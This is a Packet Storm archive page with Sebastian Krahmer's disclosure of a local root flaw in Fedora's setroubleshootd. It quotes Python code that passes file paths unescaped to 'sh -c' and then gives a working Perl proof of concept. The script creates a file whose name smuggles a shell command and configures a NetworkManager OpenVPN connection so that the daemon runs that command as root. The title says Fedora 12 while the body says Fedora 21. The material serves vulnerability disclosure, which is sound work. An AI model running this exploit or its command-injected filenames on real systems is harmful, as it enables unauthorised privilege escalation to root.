Exploit the possiblities

Fedora 12 setroubleshootd Local Root Proof Of Concept

Fedora 12 setroubleshootd Local Root Proof Of Concept
Posted Mar 30, 2015
Authored by Sebastian Krahmer

Fedora 21 setroubleshootd local root proof of concept exploit.

tags | exploit, local, root, proof of concept
systems | linux, fedora
MD5 | c01050fd0c33898ccd770a2b60b154e4

Fedora 12 setroubleshootd Local Root Proof Of Concept

Change Mirror Download
setroubleshoot tries to find out which rpm a particular
file belongs to when it finds SELinux access violation reports.
The idea is probably to have convenient reports for the admin
which type enforcement rules have to be relaxed. setroubleshoot
runs as root (although in its own domain). In util.py
we have:


266 def get_rpm_nvr_by_file_path_temporary(name):
267 if name is None or not os.path.exists(name):
268 return None
269
270 nvr = None
271 try:
272 import commands
273 rc, output = commands.getstatusoutput("rpm -qf '%s'" % name)
274 if rc == 0:
275 nvr = output
276 except:
277 syslog.syslog(syslog.LOG_ERR, "failed to retrieve rpm info for %s" % name)
278 return nvr

(and other similar occurences)

So. Yes, thats correct: The SELinux system that is only there to protect you,
passes attacker controlled data to sh -c (https://docs.python.org/2/library/commands.html)
inside a daemon running as root. Sacken lassen...

I attached a PoC which uses networkmanager's openvpn plugin to execute
arbitraty commands by triggering an access violation to a pathname
which contains shell commands.

The setroubleshootd_t domain has quite a lot of allowed rules and transitions,
so this can clearly count as privilege escalation. Furthermore a lot
of admins run their system in permissive mode (full root) even when
its shipped enforcing by default.

Also note that there are potentially remote vectors, if attackers
can control part of the filenames being created (web uploads, git, scp, ftp etc).

Sebastian


PS: I am all for SELinux but theres something on the wrong way. I counted
the LOC, and the core SELinux (kernel) has a smaller codebase than whats
framed around in python, running as root and mangling attacker controlled input.
IOW, the system that wants to protect you has fewer code enforcing the rules
than code that potentially blows up your system. And that code is python,
so let alone all the python modules and interpreter hat can have bugs on its own.
Driving such a lane _can only lead to abyss_. And I am not saying that evil
powers are creating an overly complex system to better hide their bugdoors
within.

PPS: bug-logo will follow :)

--

~ perl self.pl
~ $_='print"\$_=\47$_\47;eval"';eval
~ krahmer () suse de - SuSE Security Team


#!/usr/bin/perl

#
# Fedora21 setroubleshootd local root PoC
#
# (C) 2015 Sebastian Krahmer
#
# - requires polkit authorization to add/mod VPN connections
# to NetworkManager (default on desktop user)
# - after execution of this script, which adds appropriate
# NM connection entries, try
#
# $ nmcli c up vpn-FOOBAR
#
# a couple of times, until you see:
#
# logger[4062]: uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:setroubleshootd_t:...
#
# in the journalctl logs
#
# PS: I know in advance what the SELinux developers will say... :p
#
# I say: lulz!



# create a pathname that setroubleshootd will eventually
# query sh -c { rpm -qf ... with, fucking up ' escaping. So the
# embedded pathname is then evaluated as command
#
# There goes your NSA-grade SELinux security!!!

$file = "/tmp/foo.pem';`id|logger`;echo '";
open(O, ">", $file) or die $!;
close O;

# add connection
system("nmcli c add type vpn ifname FOOBAR vpn-type openvpn");
open(O,"|nmcli c edit vpn-FOOBAR") or die $!;

print O "set vpn.data ca = /tmp/foo.pem';`id|logger`;echo ', password-flags = 1, connection-type = password, remote =
1.2.3.4, username = FOOBAR\n";
print O "set vpn.secrets password=1\nsave\nquit\n";
close(O);


print "Now do 'nmcli c up vpn-FOOBAR' and watch logs.\n";

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    24 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close